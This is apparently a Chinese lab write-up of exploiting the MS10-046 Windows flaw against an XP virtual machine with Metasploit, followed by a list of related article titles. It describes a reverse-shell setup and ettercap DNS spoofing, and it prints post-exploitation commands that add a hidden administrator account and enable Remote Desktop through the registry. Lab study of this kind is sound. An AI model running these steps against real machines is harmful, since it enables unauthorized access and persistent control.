一、影响环境
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。

**二、**实验环境(虚拟机搭建)
目标主机:winxpsp3英文版:192.168.28.133
攻击主机:kaililinux:192.168.28.134


三、攻击过程

先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活

进入metasploit框架
Msfconsole

使用攻击模块

查看配置信息并设置

设置文件共享服务器的地址,为攻击机器
set srvhost 192.168.28.134

设置自己的ip地址,用于目标机器反弹shell

设置payload 用于反弹shell,这里是windows的

开始攻击
Expolit/run

诱导攻击
能够通过DNS挟持进一步利用MS10-046漏洞
进入到 /etc/ettercap/ 目录下
向目录下的 etter.dns 中添加欺骗的域名:

连接会话

ettercap -T -q -i eth0 -P dns_spoof 192.168.28.133(目标ip)

一些命令

后渗透利用
Getuid

Shell

net user ouyang 123456 /add

net localgroup administrators ouyang /add

创建用户完毕后,打开3389远程桌面连接端口
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

查看机器是否打开了3389

远程桌面连接

链接成功

获取完信息之后删除用户

#windowsxpsp3系统MS10-046漏洞测试相关推荐

  1. 渗透测试服务 甲方公司OA网站系统漏洞测试

    渗透测试服务,是甲方授权乙方安全公司对自身的网站,以及APP,办公系统进行的全面人工安全渗透,对漏洞的检测与测试,包括SQL注入漏洞,XSS存储漏洞,反射漏洞,逻辑漏洞,越权漏洞,我们SINE安全公司 ...

  2. windows下搭建permeate漏洞测试系统实战

    最近一直在搭建漏洞测试环境练习. 在此期间遇到很多问题,但是通过学习都一一解决.通过写此文来记录遇到的问题和解决方法. 首先,在github上看到了一个不错的permeate渗透测试系统.于是想搭建拿 ...

  3. 一次针对SAP系统的完美渗透测试

    本文讲的是一次针对SAP系统的完美渗透测试, 什么是SAP 渗透测试? SAP为"System Applications and Products"的简称,是SAP公司的产品--企 ...

  4. 国产WEB漏洞测试平台——MST

    国产WEB漏洞测试平台--MST Mst是一款Python2.7编写的小漏洞利用平台,可运行在windows | Backtrack | maxosx 等系统,专注于web漏洞的测试和各种利用插件的编 ...

  5. 20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试

    20145335郝昊<网络攻防>Exp5 MS08_067漏洞测试 实验内容 了解掌握metasploit平台的一些基本操作,能学会利用已知信息完成简单的渗透操作. 漏洞MS08_067: ...

  6. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  7. 网站漏洞测试分析查找问题攻防演练

    漏洞分析和渗透测试是网站安全攻击和防御演习攻击者的常用方法.通过收集目标系统的信息和综合分析,使用适当的攻击工具对目标系统的安全漏洞进行相关分析,验证漏洞的使用方法和难度,并通过各种攻击方法找到潜在漏 ...

  8. SQL注入漏洞测试(参数加密)

    SQL注入漏洞测试(参数加密) <此WEB业务环境对参数进行了AES加密,为了防止参数产生SQL注入,也是防止SQL注入产生的一种方法,但是这种方式就安全了么?1.掌握信息泄露的方式:2.了解A ...

  9. 使用Docker如何搭建Web漏洞测试环境?

    本文和大家分享的是使用Docker搭建Web漏洞测试环境相关知识,希望对大家学习Docker有所帮助,一起来看看吧. 由于一直在做 Web 漏洞扫描器的开发, 那么就必然少不了 Web 的漏洞测试环境 ...

  10. CentOS 7 搭建 docker+vulhub(漏洞测试靶场)

    CentOS 7 安装Vulhub(漏洞测试靶场) 一.安装Docker 1.一键安装Docker 2.手工安装Docker 3.Docker加速器 配置Docker镜像站 Linux macOS W ...

最新文章

  1. 想体验无人商店?去京东他们家直接刷脸!
  2. 银行背景下分库分表技术选型
  3. 基于物理尺寸的响应式设计(转)
  4. java 数组 题_(第22讲)java数组的一些编程题
  5. Ubuntu14.04下Neo4j图数据库官网安装部署步骤(图文详解)(博主推荐)
  6. 【论文解读】KDD2020最佳论文: 关于个性化排序任务评价指标的大讨论
  7. nginx在linux下是服务吗,[Linux]如何给Nginx添加服务
  8. Tomcat+nginx+keepalived+memcached实现双VIP负载均衡及Session会话保持
  9. java泛型不是计算运行时的数据类型
  10. Android Button 实现渐变背景色、外边框颜色、圆角弧度、点击变色(完整源码)
  11. FFDshow video encoder -CLSID
  12. UVA1515 Pool construction (最小割模型)
  13. python+webdriver(二)
  14. Python 基于项目自动生成 requirements.txt 文件
  15. javascript中typeof、undefined 和 null
  16. 【284天】每日项目总结系列022(2017.11.16)
  17. 安装设备驱动程序Android,手机adb驱动安装(Universal Adb Driver)
  18. 易优CMS插件大全-采集翻译发布插件
  19. MAC 如何快捷截图
  20. 一文读懂中国5G的真正实力

热门文章

  1. 快速实现安卓输入法!
  2. 7.19作业 防火墙知识,调研总结,包括但不限于与原理,设备使用,厂商介绍,形成报告
  3. [noip模拟赛]算算数
  4. ndoutils(ndo2db)安装部署
  5. linux内核调度 宿主机,Qemu虚拟机与宿主机之间文件传输
  6. 我常用的网站资源集合
  7. 【BI学习心得04-ALS算法与推荐系统】
  8. 示波器带宽和采样率与被测信号的关系(转)
  9. golang源代码阅读,sync系列-WaitGroup
  10. 位运算:【leedcode:只出现一次的数字】